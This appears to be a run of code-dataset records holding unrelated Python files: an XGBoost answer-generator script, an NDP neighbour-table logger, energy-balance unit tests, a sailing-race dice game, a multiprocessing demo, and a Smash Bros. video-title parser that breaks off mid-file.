1.0,\r\n 'colsample_bylevel': 1.0,\r\n 'eval_metric': 'merror',\r\n 'objective': 'multi:softmax',\r\n 'num_class': nb_outchars, # len(set(y_train)),\r\n 'silent': 1,\r\n # 'updater': 'grow_gpu'\r\n }\r\n\r\n print('Train model...')\r\n cl = xgboost.train(xgb_params,\r\n D_train,\r\n evals=[(D_val, 'val')],\r\n num_boost_round=1000, #NB_TREES,\r\n verbose_eval=10,\r\n early_stopping_rounds=10)\r\n\r\n print('Training is finished')\r\n\r\n # сохраним конфиг модели, чтобы ее использовать в чат-боте\r\n model_filename = os.path.join(tmp_folder, 'xgb_answer_generator.model')\r\n model_config = {\r\n 'solver': 'xgb',\r\n 'outshingle2id': outshingle2id,\r\n 'inshingle2id': inshingle2id,\r\n 'outchar2id': outchar2id,\r\n 'model_filename': model_filename,\r\n 'shingle_len': SHINGLE_LEN,\r\n 'NB_PREV_CHARS': NB_PREV_CHARS,\r\n 'BEG_LEN': BEG_LEN,\r\n 'END_LEN': END_LEN,\r\n 'nb_features': nb_features,\r\n 'word2lemmas_path': word2lemmas_path\r\n }\r\n\r\n with open(config_path, 'w') as f:\r\n json.dump(model_config, f)\r\n\r\n cl.save_model(model_filename)\r\n\r\n # Финальные оценки точности.\r\n y_pred = cl.predict(D_val)\r\n acc = sklearn.metrics.accuracy_score(y_true=y_test, y_pred=y_pred)\r\n print('per char accuracy={}'.format(acc))\r\n\r\n # Накопим кол-во ошибок и сэмплов для ответов разной длины.\r\n answerlen2samples = Counter()\r\n answerlen2errors = Counter()\r\n\r\n nb_errors = 0\r\n nb_test = min(1000, nb_test)\r\n for premise, question, answer in tqdm.tqdm(itertools.izip(premises_test[:nb_test],\r\n questions_test[:nb_test],\r\n answers_test[:nb_test]),\r\n total=nb_test,\r\n desc='Calculating instance accuracy'):\r\n answer2 = generate_answer(cl, tokenizer,\r\n outshingle2id, inshingle2id, outchar2id,\r\n SHINGLE_LEN, NB_PREV_CHARS, nb_features, id2outchar, None,\r\n premise, question)\r\n answer_len = len(answer)\r\n answerlen2samples[answer_len] += 1\r\n if undress(answer2) != undress(answer):\r\n nb_errors += 1\r\n answerlen2errors[answer_len] += 1\r\n\r\n print('per instance accuracy={}'.format(float(nb_test-nb_errors)/float(nb_test)))\r\n\r\n report_path = os.path.join(tmp_folder, 'xgb_answer_generator.report.txt')\r\n with codecs.open(report_path, 'w', 'utf-8') as wrt:\r\n wrt.write(u'Accuracy for answers with respect to their lengths:\\n')\r\n for answer_len in sorted(answerlen2samples.keys()):\r\n support = answerlen2samples[answer_len]\r\n nb_err = answerlen2errors[answer_len]\r\n acc = 1.0 - float(nb_err)/float(support)\r\n wrt.write(u'{:3d} {}\\n'.format(answer_len, acc))\r\n\r\n wrt.write('\\n\\n')\r\n wrt.write('Multiclass classification report:\\n')\r\n # Для classification_report нужен список только тех названий классов, которые\r\n # встречаются в y_test, иначе получим неверный отчет и ворнинг в придачу.\r\n class_names = [encode_char(id2outchar[y]) for y in sorted(set(y_test) | set(y_pred))]\r\n wrt.write(classification_report(y_test, y_pred, target_names=class_names))\r\n wrt.write('\\n\\n')\r\n #wrt.write(confusion_matrix(y_test, y_pred, labels=class_names))\r\n\r\n # Accuracy for answers with respect to their lengths:\r\n with open(os.path.join(tmp_folder, 'xgb_answer_generator.accuracy.csv'), 'w') as wrt:\r\n wrt.write('answer_len\\tnb_samples\\taccuracy\\n')\r\n for answer_len in sorted(answerlen2samples.keys()):\r\n support = answerlen2samples[answer_len]\r\n nb_err = answerlen2errors[answer_len]\r\n acc = 1.0 - float(nb_err)/float(support)\r\n wrt.write(u'{}\\t{}\\t{}\\n'.format(answer_len, support, acc))\r\n\r\n\r\n\r\nif run_mode == 'query':\r\n # Ручное тестирование натренированной модели генерации ответа.\r\n # Сначала загружаем результаты тренировки.\r\n with open(config_path, 'r') as f:\r\n cfg = json.load(f)\r\n\r\n outshingle2id = cfg['outshingle2id']\r\n inshingle2id = cfg['inshingle2id']\r\n outchar2id = cfg['outchar2id']\r\n model_filename = cfg['model_filename']\r\n SHINGLE_LEN = cfg['shingle_len']\r\n NB_PREV_CHARS = cfg['NB_PREV_CHARS']\r\n BEG_LEN = cfg['BEG_LEN']\r\n nb_features = cfg['nb_features']\r\n\r\n generator = xgboost.Booster()\r\n generator.load_model(cfg['model_filename'])\r\n\r\n phrase2sdr = None\r\n\r\n id2outchar = dict((i, c) for c, i in outchar2id.items())\r\n\r\n while True:\r\n premise = u''\r\n question = None\r\n\r\n premise = raw_input('Premise:> ').decode(sys.stdout.encoding).strip().lower()\r\n if len(premise) > 0 and premise[-1] == u'?':\r\n question = premise\r\n premise = u''\r\n\r\n if question is None:\r\n question = raw_input('Question:> ').decode(sys.stdout.encoding).strip().lower()\r\n if len(question) == 0:\r\n break\r\n\r\n answer = generate_answer(generator, tokenizer,\r\n outshingle2id, inshingle2id, outchar2id,\r\n SHINGLE_LEN, NB_PREV_CHARS, nb_features, id2outchar, phrase2sdr,\r\n premise, question)\r\n\r\n print(u'Answer: {}'.format(answer))\r\n","sub_path":"PyModels/xgb_answer_generator.py","file_name":"xgb_answer_generator.py","file_ext":"py","file_size_in_byte":30202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"453379283","text":"#!/usr/bin/env python3\nfrom ipaddress import *\nfrom nullroute.system.ifconfig import *\nfrom pprint import pprint\nimport sqlalchemy as δ\nimport sqlalchemy.orm\nimport time\n\n## main\n\nMAX_IPV4_LEN = len(\"255.255.255.255\")\nMAX_IPV6_LEN = len(\"ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff\")\nMAX_MAC_LEN = len(\"ff:ff:ff:ff:ff:ff\")\n\n_connectors = {\n \"local\": LocalConnector,\n \"ssh\": SshConnector,\n}\n\n_systems = {\n \"linux\": LinuxNeighbourTable,\n \"bsd\": FreeBsdNeighbourTable,\n \"solaris\": SolarisNeighbourTable,\n}\n\ndb_url = None\nhosts = []\nmax_age_days = 6*30\n\nwith open(\"/home/grawity/lib/arplog.conf\") as f:\n for line in f:\n if line.startswith(\"#\"):\n continue\n k, v = line.strip().split(\" = \", 1)\n if k == \"db\":\n db_url = v\n elif k == \"host\":\n host_v, conn_v, sys_v, *rest = v.split(\", \")\n hosts.append((host_v, _connectors[conn_v], _systems[sys_v]))\n elif k == \"age\":\n max_age_days = int(v)\n\n#δBase = δ.ext.declarative.declarative_base()\n#\n#class Assoc(δBase):\n# __tablename__ = \"arplog\"\n#\n# id = δ.Column(δ.Integer, δ.Sequence(\"arplog_seq\"), primary_key=True)\n# ip_addr = δ.Column(δ.String(MAX_IPV6_LEN), nullable=False)\n# mac_addr = δ.Column(δ.String(MAX_MAC_LEN), nullable=False)\n# first_seen = δ.Column(δ.Integer)\n# last_seen = δ.Column(δ.Integer)\n\nδEngine = δ.create_engine(db_url)\nδConn = δEngine.connect()\n\nst = δ.sql.text(\"\"\"\n INSERT INTO arplog (ip_addr, mac_addr, first_seen, last_seen)\n VALUES (:ip_addr, :mac_addr, :now, :now)\n ON DUPLICATE KEY UPDATE last_seen=:now\n \"\"\")\n\nfor host, conn_type, nt_type in hosts:\n print(\"connecting to\", host)\n nt = nt_type(conn_type(host))\n now = time.time()\n for item in nt.get_ndp6():\n ip = item[\"ip\"].split(\"%\")[0]\n mac = item[\"mac\"]\n if ip.startswith(\"fe80\"):\n continue\n print(\"- found\", ip, \"->\", mac)\n #assoc = Assoc(ip_addr=ip, mac_addr=mac, first_seen=now, last_seen=now)\n bound_st = st.bindparams(ip_addr=ip, mac_addr=mac, now=now)\n r = δConn.execute(bound_st)\n\nmax_age_secs = max_age_days*86400\n\nprint(\"cleaning up old records\")\nst = δ.sql.text(\"\"\"\n DELETE FROM arplog WHERE last_seen < :then\n \"\"\")\nr = δConn.execute(st.bindparams(then=time.time()-max_age_secs))\n","sub_path":"net/ndpwatch.py","file_name":"ndpwatch.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"607367673","text":"from etm_tools.energy_balance_operations.energy_balance import EnergyBalance\n\n# See the conftest.py for the dummy energy_balance:\n# Electricity Coking coal Anthracite Total\n# Final consumption - industry sector - chemical and petrochemical - energy use 0 9900 1200 10100\n# Gross electricity production - autoproducer electricity only 0 5000 10000 15000\n\ndef test_calculate_total(energy_balance):\n # With an empty row\n energy_balance.add_empty_row('Empty')\n\n assert energy_balance.eb['Total']['Empty'] == 0\n\n energy_balance.calculate_total('Empty')\n\n assert energy_balance.eb['Total']['Empty'] == 0\n\n # Fill in some value\n energy_balance.eb['Electricity']['Empty'] = 10000\n energy_balance.calculate_total('Empty')\n\n assert energy_balance.eb['Total']['Empty'] == 10000\n\n # Fill in a second value\n energy_balance.eb['Anthracite']['Empty'] = 5000\n energy_balance.calculate_total('Empty')\n\n assert energy_balance.eb['Total']['Empty'] == 15000\n\n\ndef test_shift_energy(energy_balance):\n energy_balance.shift_energy('Gross electricity production - autoproducer electricity only',\n 'New flow', {'Coking coal': 900})\n\n assert energy_balance.eb['Coking coal']['New flow'] == 900\n assert energy_balance.eb['Coking coal']['Gross electricity production - autoproducer electricity only'] == 4100\n assert energy_balance.eb['Coking coal']['Gross electricity production - autoproducer electricity only - original'] == 5000\n\n\ndef test_add_row_with_energy(energy_balance):\n # Without total\n energy_balance.add_row_with_energy('Some powerplant', {'Electricity': 900}, total=False)\n\n assert energy_balance.eb['Electricity']['Some powerplant'] == 900\n assert energy_balance.eb['Total']['Some powerplant'] == 0\n\n # With total\n energy_balance.add_row_with_energy('Some industry', {'Coking coal': 1000})\n\n assert energy_balance.eb['Coking coal']['Some industry'] == 1000\n assert energy_balance.eb['Total']['Some industry'] == 1000\n\n\ndef test_add_row_from_share(energy_balance):\n energy_balance.add_row_from_share('Gross electricity production - autoproducer electricity only',\n 'My new flow', 0.5)\n\n assert energy_balance.eb['Coking coal']['My new flow'] == 2500\n\n\ndef test_share_to_tj(energy_balance):\n flows = [\n 'Gross electricity production - autoproducer electricity only',\n 'Final consumption - industry sector - chemical and petrochemical - energy use'\n ]\n\n # With one flow\n in_tj = energy_balance.share_to_tj(\n flows[0],\n 0.5,\n ['Coking coal', 'Anthracite'],\n merge_products=True\n )\n assert in_tj == 7500\n\n\n # With two flows\n in_tj = energy_balance.share_to_tj(\n flows,\n 0.5,\n ['Coking coal', 'Anthracite'],\n merge_products=True\n )\n assert in_tj == 13050\n\n # With two flows and unmerged products\n in_tj = energy_balance.share_to_tj(\n flows,\n 0.5,\n ['Coking coal', 'Anthracite'],\n merge_products=False\n )\n assert in_tj == {'Anthracite': 5600.0, 'Coking coal': 7450.0}\n\ndef test_product_shares_to_tj(energy_balance):\n flow = 'Gross electricity production - autoproducer electricity only'\n product_shares = {'Anthracite': 0.5, 'Coking coal': 1.0}\n\n product_amounts = energy_balance.product_shares_to_tj(flow, product_shares)\n\n assert product_amounts['Anthracite'] == 5000\n assert product_amounts['Coking coal'] == 5000\n\n\ndef test_swap_energy(energy_balance):\n from_flow = 'Final consumption - industry sector - chemical and petrochemical - energy use'\n to_flow = 'Gross electricity production - autoproducer electricity only'\n\n energy_balance.swap_energy(\n from_flow,\n to_flow,\n ['Anthracite'], ['Coking coal']\n )\n\n assert energy_balance.eb['Coking coal'][from_flow] == 11100\n assert energy_balance.eb['Anthracite'][from_flow] == 0\n\n assert energy_balance.eb['Coking coal'][to_flow] == 3800\n assert energy_balance.eb['Anthracite'][to_flow] == 11200\n\n\ndef test_swap_energy_from_two_products(energy_balance):\n from_flow = 'Final consumption - industry sector - chemical and petrochemical - energy use'\n to_flow = 'Gross electricity production - autoproducer electricity only'\n\n energy_balance.eb['Product X'] = 1000\n\n # When swapping from two products to one\n energy_balance.swap_energy(\n from_flow,\n to_flow,\n ['Anthracite', 'Product X'], ['Coking coal']\n )\n\n assert energy_balance.eb['Coking coal'][from_flow] == 12100\n assert energy_balance.eb['Anthracite'][from_flow] == 0\n assert energy_balance.eb['Product X'][from_flow] == 0\n\n assert energy_balance.eb['Coking coal'][to_flow] == 2800\n assert energy_balance.eb['Anthracite'][to_flow] == 11200\n assert energy_balance.eb['Product X'][to_flow] == 2000\n\n\ndef test_swap_energy_with_deficit(energy_balance):\n from_flow = 'Gross electricity production - autoproducer electricity only'\n to_flow = 'Final consumption - industry sector - chemical and petrochemical - energy use'\n\n # Trying to swap 10000 Anth for Coal when there is only 9900 Coal available\n energy_balance.swap_energy(\n from_flow,\n to_flow,\n ['Anthracite'],['Coking coal']\n )\n\n # Should only swap the 9900, 100 Anthracite remains\n assert energy_balance.eb['Coking coal'][from_flow] == 14900\n assert energy_balance.eb['Anthracite'][from_flow] == 100\n\n assert energy_balance.eb['Coking coal'][to_flow] == 0\n assert energy_balance.eb['Anthracite'][to_flow] == 11100\n\n\ndef test_swap_energy_with_deficit_and_backup_flow(energy_balance):\n from_flow = 'Gross electricity production - autoproducer electricity only'\n to_flow = 'Final consumption - industry sector - chemical and petrochemical - energy use'\n backup_flow = 'Some other flow'\n\n energy_balance.add_row_with_energy(backup_flow, {'Coking coal': 900}, total=False)\n\n # Trying to swap 10000 Anth for Coal when there is only 9900 Coal available\n energy_balance.swap_energy(\n from_flow,\n to_flow,\n ['Anthracite'],['Coking coal'],\n backup_flow=backup_flow\n )\n\n assert energy_balance.eb['Coking coal'][from_flow] == 15000\n assert energy_balance.eb['Anthracite'][from_flow] == 0\n\n assert energy_balance.eb['Coking coal'][to_flow] == 0\n assert energy_balance.eb['Anthracite'][to_flow] == 11100\n\n # And the remaining 100 should be swapped with the backup flow\n assert energy_balance.eb['Coking coal'][backup_flow] == 800\n assert energy_balance.eb['Anthracite'][backup_flow] == 100\n\ndef test_swap_energy_with_deficit_and_backup_flow_that_has_defict(energy_balance):\n from_flow = 'Gross electricity production - autoproducer electricity only'\n to_flow = 'Final consumption - industry sector - chemical and petrochemical - energy use'\n backup_flow = 'Some other flow'\n\n energy_balance.add_row_with_energy(backup_flow, {'Coking coal': 50}, total=False)\n\n # Trying to swap 10000 Anth for Coal when there is only 9900 Coal available in to_flow,\n # and only 50 in backup\n energy_balance.swap_energy(\n from_flow,\n to_flow,\n ['Anthracite'],['Coking coal'],\n backup_flow=backup_flow\n )\n\n assert energy_balance.eb['Coking coal'][from_flow] == 14950\n assert energy_balance.eb['Anthracite'][from_flow] == 50\n\n assert energy_balance.eb['Coking coal'][to_flow] == 0\n assert energy_balance.eb['Anthracite'][to_flow] == 11100\n\n # And the remaining 100 should be swapped with the backup flow\n assert energy_balance.eb['Coking coal'][backup_flow] == 0\n assert energy_balance.eb['Anthracite'][backup_flow] == 50\n\n\ndef test_negative_products(energy_balance):\n negative_flow = 'Some flow with negative values'\n energy_balance.add_row_with_energy(negative_flow, {'Coking coal': -50, 'Anthracite': 20}, total=False)\n\n neg = energy_balance.all_negative_products(negative_flow)\n assert 'Coking coal' in neg\n assert not 'Anthracite' in neg\n assert neg['Coking coal'] == 50\n\n\ndef test_load_from_world_balance():\n path = 'tests/fixtures/SG.csv'\n\n eb = EnergyBalance.from_world_balance_file(2019, 'SG', path)\n\n assert 'Transformation input - electricity and heat generation - energy use' in eb.eb.index\n assert eb.all_negative_products('Transformation output - electricity and heat generation - main activity producer electricity only')\n","sub_path":"tools/energy_balance_generator/tests/energy_balance_operations/test_energy_balance.py","file_name":"test_energy_balance.py","file_ext":"py","file_size_in_byte":8564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"617119244","text":"import random\n\n\nclass ImportantNpc:\n def __init__(self, name, prof_bonus, dex, int, cha, distance, bombs):\n self.name = name\n self.prof_bonus = prof_bonus\n self.dex = dex\n self.int = int\n self.cha = cha\n self.distance = distance\n self.bombs = bombs\n\n def d20_roll(self):\n return random.randint(1,20)\n\n def start_position(self):\n position = self.d20_roll() + self.dex + self.prof_bonus\n return self.name, 'start position:', position\n\n def chicken(self):\n score = self.d20_roll() + self.cha\n return self.name, 'chicken score:', score\n\n def read_wind(self):\n nature = self.d20_roll() + self.int + self.prof_bonus\n if nature == 20 + self.int + self.prof_bonus:\n self.distance += 60\n print('Crit success')\n elif nature >= 13:\n self.distance += 50\n print('Success')\n elif 13 > nature >= 2 + self.int + self.prof_bonus:\n s_or_t = random.randint(1, 2)\n if s_or_t == 1:\n self.distance += 50\n else:\n self.distance += 25\n print('Fail')\n else:\n self.distance += 25\n print('Crit fail')\n return self.name, 'distance:', self.distance\n\n def round_buoy(self):\n acrobatics = self.d20_roll() + self.dex + self.prof_bonus\n if acrobatics == 20 + self.dex + self.prof_bonus:\n self.distance += 10\n print('Crit success')\n elif acrobatics >= 15:\n print('Success')\n elif 15 > acrobatics >= 2 + self.dex + self.prof_bonus:\n self.distance -= 25\n print('Fail')\n else:\n self.distance -= 25\n print('Crit fail, no spinnaker first round downwind')\n return self.name, 'distance:', self.distance\n\n def downwind_sailing(self):\n check = input('Is your spinnaker up? (yes or no): ')\n if check[0].lower() == 'y':\n dc = 16\n movement = 75\n else:\n dc = 14\n movement = 50\n acrobatics = self.d20_roll() + self.dex + self.prof_bonus\n if acrobatics == 20 + self.dex + self.prof_bonus:\n self.distance += movement + 20\n print('Crit success!')\n elif acrobatics >= dc:\n self.distance += movement\n print('Success')\n elif dc > acrobatics >= 2 + self.dex + self.prof_bonus:\n self.bombs += 1\n if self.bombs == 1:\n if movement == 75:\n self.distance += 35\n else:\n self.distance += 50\n print('Fail')\n print('Bomb count:', self.bombs)\n elif self.bombs == 3:\n print('Fail')\n print('Ship blows up!')\n else:\n print('Fail')\n print('Bomb count:', self.bombs)\n\n else:\n self.bombs += 2\n if self.bombs >= 3:\n print('Crit fail')\n print('The boat blows up!')\n else:\n print('Crit fail')\n print('Bomb count:', self.bombs)\n return self.name, 'distance:', self.distance\n\n\n# -------- L O G I C --------\n\nkeel_spraylog = ImportantNpc('Keel Spraylog',2,5,2,4,0,0)\n\nprint(keel_spraylog.start_position())\n\nprint(keel_spraylog.chicken())\n\nwhile keel_spraylog.distance < 250:\n print(keel_spraylog.read_wind())\n\nprint(keel_spraylog.round_buoy())\n\nwhile keel_spraylog.distance < 500:\n print(keel_spraylog.downwind_sailing())\n if keel_spraylog.bombs >=3:\n break\n","sub_path":"sailorsLeagueNpcs.py","file_name":"sailorsLeagueNpcs.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"133626974","text":"from os import makedirs\nimport csv\nfrom os.path import abspath, exists\nimport pandas as pd\n\ndef write_history_to_csv(file_path, cata_name, info_list):\n cata_history_path = abspath(file_path + \"/\" + cata_name + \".csv\")\n if not exists(file_path):\n makedirs(file_path)\n if not exists(cata_history_path):\n with open(cata_history_path, \"w\", newline='') as csv_file:\n pass\n\n #with open(history_log_path, \"a\") as txt_file:\n #txt_file.write(\"--------\")\n #txt_file.write(\" \".join(info_list[:-1]))\n #txt_file.write(info_list[-1])\n \n with open(cata_history_path, \"a\", newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(info_list)\n print(\"--------{0}--------\".format(cata_name))\n print(\" \".join(info_list[:-1]))\n \ndef check_history_in_csv(file_path, cata_name, cata_path):\n cata_history_path = abspath(file_path + \"/\" + cata_name + \".csv\")\n if not exists(cata_history_path):\n return False\n \n history_df = pd.read_csv(cata_history_path, header=None, encoding='cp1252')\n last_col = history_df.iloc[:,-1]\n \n if cata_path in last_col.unique():\n return True\n else:\n return False","sub_path":"download_scripts/history_writer.py","file_name":"history_writer.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"33233075","text":"# Copyright 2017 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for autoscaler.py\"\"\"\n\nfrom strategies import DOWNSCALE_STRATEGIES\nfrom strategies import UPSCALE_STRATEGIES\n\n\ndef test_downscale():\n downscale_strategy = DOWNSCALE_STRATEGIES['incremental']\n assert downscale_strategy(5) == 3\n assert downscale_strategy(4) == 3\n assert downscale_strategy(3) == 3\n\n\ndef test_upscale():\n upscale_strategy = UPSCALE_STRATEGIES['incremental']\n assert upscale_strategy(3) == 5\n","sub_path":"bigtable/autoscaler/strategies_test.py","file_name":"strategies_test.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"216442508","text":"#!/usr/bin/env python\r\n# -*-coding:utf-8 -*-\r\n\r\nimport multiprocessing\r\nimport time,os\r\n\r\n\r\n'''\r\n time类的用法\r\n'''\r\ndef time_Useage():\r\n i=20\r\n while i>0:\r\n print(\"--------- 1 ----------------\")\r\n time.sleep(10)\r\n i=i-1\r\n\r\n'''\r\n 本方法中 写了两个循环,每次执行这个方式时,第一个循环总是被先执行,第二个循环后执行\r\n'''\r\ndef narmal_process():\r\n i=20\r\n while i>0:\r\n print(\" %s,%s\" %(multiprocessing.current_process().name,multiprocessing.current_process().pid))\r\n time.sleep(0.2)\r\n i=i-1\r\nif __name__ == '__main__':\r\n print(os.getpid(),\"主进程开始...\")\r\n p1=multiprocessing.Process(target=narmal_process)\r\n p2=multiprocessing.Process(target=narmal_process)\r\n\r\n '''\r\n 以下代码 p1 p2 两个子进程会交替执行,也就是异步执行\r\n p1.start()\r\n p2.start()\r\n p1.join()\r\n p2.join()\r\n '''\r\n\r\n '''以下代码两个子进程会按照先后顺序执行,也就是同步执行'''\r\n p1.start()\r\n p1.join()\r\n p2.start()\r\n p2.join()\r\n\r\n print(os.getpid(),\"主进程结束...\")","sub_path":"demo_multiprocessing.py","file_name":"demo_multiprocessing.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"414338325","text":"from datetime import datetime\nimport logging\n\n# Smashvods Libraries\nimport utility\n\nlogger = logging.getLogger(utility.logger_name)\ncolor_list = [\"neutral\", \"normal\", \"default\", \"vanilla\", \"white\", \"black\",\n \"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\", \"pink\",\n \"gray\", \"grey\", \"regular\", \"brown\", \"blu\", \"grn\", \"usa\", \"blk\",\n \"#1\", \"#2\", \"master\", \"best\", \"highrank\", \"strong\",\n \"fire\", \"gold\", \"naked\", \"alt\", \"og\", \"p1\", \"p2\", \"p3\", \"p4\",\n \"christmas\", \"halloween\", \"sports\", \"mexican\", \"punk\", \"love\",\n \"beast\", \"vacation\", \"nostalgia\", \"undercover\", \"schoolgirl\"]\nchamp_str_list = [\"grand\", \"winner\", \"loser\", \"pool\", \"bracket\", \"match\", \"gf\",\n \"final\", \"semi\", \"quarter\", \"eighth\", \"single\", \"friendlie\"]\nabbrev_str_list = [\"wf\", \"lf\", \"wsf\", \"ws\", \"lsf\", \"ls\",\n \"wqf\", \"wq\", \"lqf\", \"lq\"]\nsep_str_list = [\"-\", \";\", \":\", \"~\", \"ft.\", \"|\", \"1v1\", \"*\", \"vs\", \"mm\"]\n\n\ndef format_vid_list(vid_list, game_mode):\n start_time = datetime.now()\n nickname_list = create_char_nickname_list(game_mode)\n args = list()\n\n # vid_list: {\"title\" \"date\" \"channelId\" \"videoId\"}\n for video in vid_list:\n orig_title = video[\"title\"]\n c1_title = str()\n c2_title = str()\n p1_title = str()\n p2_title = str()\n\n valid_bracket_count = 0\n\n try:\n new_title = orig_title.replace(\"[\", \"(\").replace(\"]\", \")\")\n new_title = new_title.replace(\"((\", \"(\").replace(\"))\", \")\")\n b1_index = new_title.find(\"(\")\n b2_index = new_title.find(\")\", b1_index + 1)\n\n while b1_index >= 0 and b2_index >= 0:\n # Continue to next iteration if bracket_str too small.\n bracket_str = new_title[b1_index:b2_index + 1]\n if b2_index - b1_index < 3:\n new_title = new_title.replace(bracket_str, str())\n b1_index = new_title.find(\"(\", b1_index)\n b2_index = new_title.find(\")\", b1_index + 1)\n continue\n\n # Continue to next iteration if new_inner_str invalid.\n inner_str = bracket_str[1:-1]\n new_inner_str = format_char_str(\n inner_str, nickname_list, c1_title)\n if not new_inner_str:\n new_title = new_title.replace(bracket_str, str())\n b1_index = new_title.find(\"(\", b1_index)\n b2_index = new_title.find(\")\", b1_index + 1)\n continue\n\n # Set the character 1 and character 2 title.\n valid_bracket_count += 1\n if valid_bracket_count == 1:\n c1_title = new_inner_str\n elif valid_bracket_count == 2:\n c2_title = new_inner_str\n\n # Find the player 1 title.\n if valid_bracket_count == 1 and not p1_title:\n p1_index = find_p1_index(new_title, b1_index, game_mode)\n p1_title = new_title[p1_index:b1_index]\n p2_index = b2_index + 1\n\n # Find the player 2 title.\n if valid_bracket_count == 2 and not p2_title:\n p2_title = new_title[p2_index:b1_index].lower()\n for vs_str in [\"vs.\", \"vs\", \" v \", \"v.\"]:\n if vs_str in p2_title:\n p2_index += p2_title.index(vs_str) + len(vs_str)\n break\n p2_title = new_title[p2_index:b1_index]\n\n # Exit Search if more than two valid brackets found.\n if valid_bracket_count == 3:\n break\n\n b1_index = new_title.find(\"(\", b1_index + len(bracket_str))\n b2_index = new_title.find(\")\", b1_index + 1)\n\n # Check if video should be added\n add_video_flag = True\n if valid_bracket_count != 2:\n add_video_flag = False\n\n for double_str in [\"/\", \"&\", \"+\"]:\n if double_str in p1_title and double_str in p2_title:\n add_video_flag = False\n\n if not add_video_flag:\n continue\n\n # Remove whitespace and sponsors from player strings.\n p1_title = format_player_str(p1_title)\n p2_title = format_player_str(p2_title)\n\n args.append([p1_title, c1_title, p2_title,\n c2_title, game_mode, video[\"id\"]])\n\n except ValueError:\n logger.error(\"ValueError: %s\", orig_title)\n except UnboundLocalError:\n logger.error(\"UnboundLocalError: %s\", orig_title)\n except IndexError:\n logger.error(\"IndexError: %s\", orig_title)\n\n finish_time = (datetime.now() - start_time).total_seconds()\n logger.info(\"Formatted %s/%s results in %ss\",\n len(args), len(vid_list), finish_time)\n\n return args\n\n\ndef create_char_nickname_list(game_mode):\n output_data = list()\n query = \"SELECT name,nickname FROM characters\"\n query += \" WHERE game = '\" + game_mode + \"'\"\n char_list = utility.mysql_query(query)\n\n for main in char_list:\n output_data.append([main[\"name\"], format_sv_str(main[\"name\"])])\n if main[\"nickname\"]:\n nicknames = [x.strip() for x in main[\"nickname\"].split(\",\")]\n for nickname in nicknames:\n output_data.append([main[\"name\"], nickname])\n\n return output_data\n\n\ndef format_sv_str(input_string):\n output_string = input_string.lower().replace(\" \", \"\").replace(\"'\", \"\")\n output_string = output_string.replace(\"-\", \"\").replace(\".\", \"\")\n return output_string\n\n\ndef format_char_str(full_char_str, char_name_list, c1_title):\n full_char_str = format_sv_str(full_char_str)\n\n # Split up character list\n split_char = \",\"\n for char_split_str in [\",\", \"/\", \"+\", \";\", \"&\"]:\n if char_split_str in full_char_str:\n split_char = char_split_str\n break\n\n if split_char == \"&\":\n for and_char_str in [\"g&w\", \"game&\", \"&luma\"]:\n if and_char_str in full_char_str:\n split_char = \",\"\n\n if split_char != \"&\":\n full_char_str = full_char_str.replace(\"&\", \"and\")\n char_list = [x.strip() for x in full_char_str.split(split_char)]\n\n # Remove character colors\n color_chars = list()\n colorless_str = str()\n for char_str in char_list:\n for color_name in color_list:\n if char_str.find(color_name) == 0:\n colorless_str = char_str.replace(color_name, \"\")\n break\n\n if colorless_str:\n color_chars.append(colorless_str)\n else:\n color_chars.append(char_str)\n\n char_list = color_chars\n final_chars = list()\n for m in char_name_list:\n if m[1] in char_list:\n final_chars.append(m[0])\n # If the c1 was valid, check for valid color in c2.\n if final_chars:\n return \",\".join(final_chars)\n elif c1_title:\n for color_name in color_list:\n if full_char_str == color_name:\n return c1_title\n return str()\n\n\ndef find_p1_index(new_title, b1_index, game_mode):\n p1_index = 0\n pre_c1_title = new_title[:b1_index].lower()\n p1_list = pre_c1_title.split()\n\n # Check for colons in the entire string.\n if \":\" in pre_c1_title:\n if \":)\" not in pre_c1_title:\n colon_index = pre_c1_title.rfind(\":\")\n if colon_index >= p1_index:\n p1_index = colon_index + len(\":\")\n\n # Check for dashes in the entire string.\n if \" -\" in pre_c1_title:\n dash_index = pre_c1_title.rfind(\" -\")\n if dash_index >= p1_index:\n p1_index = dash_index + 2\n\n # Remove the string most adjacent to the b1_index.\n pre_p1_index = b1_index\n if p1_list:\n pre_p1_index = pre_c1_title.rfind(p1_list[-1])\n p1_list = p1_list[:-1]\n\n # Create a string with the most adjacent string removed.\n if p1_list:\n pre_p1_index = pre_c1_title.rfind(p1_list[-1], 0, pre_p1_index)\n pre_c1_title = pre_c1_title[:pre_p1_index + len(p1_list[-1])]\n\n # Check for game title (ie. ssbm, ssb4, sfv)\n for game_key_str in utility.game_space_keywords[game_mode]:\n if game_key_str in pre_c1_title:\n game_index = pre_c1_title.rfind(game_key_str)\n if game_index >= p1_index:\n p1_index = game_index + len(game_key_str)\n\n for p1_list_str in p1_list:\n # Remove the separator title (ie. -, ;, ft., etc)\n for sep_str in sep_str_list:\n if p1_list_str.endswith(sep_str):\n sep_index = pre_c1_title.rfind(p1_list_str)\n if sep_index >= p1_index:\n p1_index = sep_index + len(p1_list_str)\n\n # Remove the champion title (ie. winners, quarters, etc)\n for champ_str in champ_str_list:\n champ_str_flag = False\n if 